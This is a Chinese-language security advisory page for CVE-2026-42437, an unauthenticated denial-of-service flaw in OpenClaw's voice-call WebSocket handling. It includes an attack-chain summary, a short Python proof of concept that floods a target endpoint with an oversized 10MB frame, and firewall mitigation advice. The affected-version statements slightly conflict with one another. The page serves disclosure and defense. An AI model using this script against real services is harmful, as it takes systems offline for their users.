CVE-2026-42437 CVSS 7.5 高危

CVE-2026-42437 OpenClaw WebSocket拒绝服务漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42437

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.9之前的版本在语音通话实时WebSocket路径中存在安全漏洞。由于系统未正确验证传入的WebSocket帧大小，远程攻击者可以发送特制的超大帧。这会导致资源耗尽或处理异常，从而使服务不可用。该漏洞无需认证即可通过网络利用，具有较高的风险。

技术细节

该漏洞位于OpenClaw的voice-call realtime WebSocket处理模块中。在建立WebSocket连接后，系统未对接收到的数据帧长度进行有效的边界检查。攻击者可以利用此缺陷，构造并发送包含超长Payload的恶意WebSocket数据帧。当服务器尝试处理这些过大帧时，会消耗过多的内存或CPU资源，甚至导致进程崩溃。由于CVSS向量显示为PR:N（无需权限）和UI:N（无用户交互），攻击者可以轻易地通过网络发起攻击，直接影响系统的可用性（A:H）。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是OpenClaw 2026.4.9或更早版本，并定位到暴露的voice-call realtime WebSocket接口。

STEP 2

漏洞利用

攻击者向该WebSocket接口发送一个或多个特制的超大WebSocket数据帧，绕过正常的输入验证机制。

STEP 3

影响达成

服务器在处理异常帧时耗尽资源或发生崩溃，导致合法用户无法访问语音通话服务，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets

# PoC for CVE-2026-42437: OpenClaw WebSocket DoS
async def send_oversized_frame(uri):
    try:
        async with websockets.connect(uri) as websocket:
            print(f"Connected to {uri}")
            # Send an oversized payload to trigger the DoS
            # Adjust payload size as needed based on server limits
            large_payload = "A" * 10000000  # 10MB payload
            print("Sending oversized frame...")
            await websocket.send(large_payload)
            print("Payload sent. Check server availability.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    target_uri = "ws://target-ip:port/websocket-path" 
    # Replace with actual target WebSocket endpoint
    asyncio.get_event_loop().run_until_complete(send_oversized_frame(target_uri))

影响范围

OpenClaw < 2026.4.10

OpenClaw 2026.4.9

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界（如防火墙或WAF）配置规则，检测并阻断异常大小的WebSocket数据包。此外，可以暂时关闭非必要的WebSocket服务接口以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表